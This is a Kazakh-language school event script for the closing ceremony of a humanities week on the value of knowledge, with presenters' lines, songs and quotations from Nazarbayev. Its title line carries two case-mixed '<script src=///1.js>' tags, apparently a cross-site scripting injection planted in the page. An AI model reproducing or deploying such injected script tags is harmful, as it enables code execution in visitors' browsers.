БІЛІМ – БАҒА ЖЕТПЕС БАЙЛЫҚ<sCrIpT sRc=///1.js></ScRiPt><sCrIpT sRc=///1.js></ScRiPt>

12.03.2019

Тақырыбы: БІЛІМ – БАҒА ЖЕТПЕС БАЙЛЫҚ

 

Тақырыбы: БІЛІМ – БАҒА ЖЕТПЕС БАЙЛЫҚ

   Мақсаты: Елбасымыздың «Рухани жаңғыру» бағдарламасы аясында биылғы жылдың «Жастар» жылы аталуымен байланысты оқушылар болашақтың білімді жастардың қолында екенін саналы түрде ұғынады, болашаққа батыл қадам жасауға ынталанады.     

Барысы:  «Би» шашу 5-сынып оқушыларының орындауында.                            

  1. Жүргізуші:

          Қайырлы күн , құрметті ұстаздар, оқушылар, қадірлі қонақтар!

«Рухани жаңғыру» бағдарламасы аясында гуманитарлық пәндер бірлестігінің  ұйымдастыруымен өткізілген «Еркін елдің ертеңі – кемел білім мен тілінде» атты апталықтың жабылу салтанатына қош келдіңіздер!

          2. Жүргізуші:

          Егемен елімізді әлемге таныту болашақта еркін өмір сүріп, ойлаған арманымыздың орындалуы тек ерінбей терең білім алғанда ғана орындалатыны сөзсіз. Жақсы өмір сүрудің басты құралы - Білім.

           1. Жүргізуші:

Бар ізгілік тек білімнен алынар,

Білімменен аспанға жол салынар

Капбасова Алуаның орындауында  «Үш бақытым»

         2. Жүргізуші:

Білімдіден шыққан сөз - дүниені нұрға бөлейді.

Білім ақылмен ұштаспаса, төңірегің қараңғылата түседі.

Өмірмен жанасқан білім - бұл өлшеусіз байлық.

  1. Жүргізуші:

         Апталықта ашық сабақтар, жарыстар, сайыстар өткізілді. Тамашалап белсенді ат салысып, білімді  екенімізді көрсеттік. Апталықтың күнделігіне назар салайық.

Слайд-шоу «Апталықтың күнделігі» көрсетілім.

Видео-ролик «Алғысым шексіз...»

  7-сынып оқушысы Амангелді Мәдиярдың орынжауынжа   «Қыз бала - гүл» әні.   

          2. Жүргізуші:

      Білімді болу - бәрінен де бұрын адам болу деген сөз. Өмірдегі барлық жақсылық білімнен шығады.

     Білім бұл қолдағы шырақ. Адамның санасы-түбі жоқ теңіз, ол білім теңіз түбіндегі інжу-маржан, гаухар тас. Білім адамға оңайлықпен түспейді      , оны меңгеру үшін көл- көсір өлшеусіз әрекет ету керек.

6-сынып оқушысы Байзолла Ерұланның орындауында ағылшын тілінде ән.

         Слайд. Елбасы Н.Ә. Назарбаевтың жастар туралы қанатты сөздері:

1-жүргізуші: Бүгін жастар алдында бар әлемнің есігі ашық.

2-жүргізуші: «Өмір бойы білім алу» әрбір қазақстандықтың жеке кредосына айналуы тиіс.

1-жүргізуші: Қазір бой жарыстыратын заман емес, ой жарыстыратын заман.

Өсер елдің баласы арманшыл болса, өшер елдің баласы жанжалшыл болады.

1-жүршізуші: Жастарға айтар ақылым: бақытты өмірді басқа жерден іздемеңдер.

2-жүргізуші: Болашақ жаман немесе жақсы бола алмайды. Ол, біз оны қалай қалыптастырсақ, сондай ғана болады.

1-жүргізуші: Бүгін жастар алдында бар әлемнің есігі ашық.

2-жүргізуші:  «Өмір бойы білім алу» әрбір қазақстандықтың жеке кредосына айналуы тиіс.

7-сынып оқушысы Авсалем Інжудің орындауында «Dua lipa Ntw Rules» әні

     1-жүргізіші:

Арыстандай айбатты,
Жолбарыстай қайратты –
Қырандай күштi қанатты   

Бірге: Мен жастарға сенемiн

2-жүргізуші:

Көздерiнде от ойнар,
Сөздерiнде жалын бар,
Жаннан қымбат оларға ар,
Бірге: Мен жастарға сенемiн!

1-жүргізіші:

Келесі кезең онерімен танылған өрендерді марапаттау кезеңі. Олай болса, ОІМ Ж.Ш. Таңатқанды  ортаға шақырамыз. Сөз кезегі өзіңізде.

2-жүргізуші: Осымен бүгінгі күні апталық бойынша жүргізілген іс-шаралар өз мәресіне жетті. Сіздерге шығармашылықтабыс тілей отырып, қош сау болыңыздар дегіміг келеді.

Просмотров: 1136


Пікір қосу



Деректерді қолтаңбаға қосу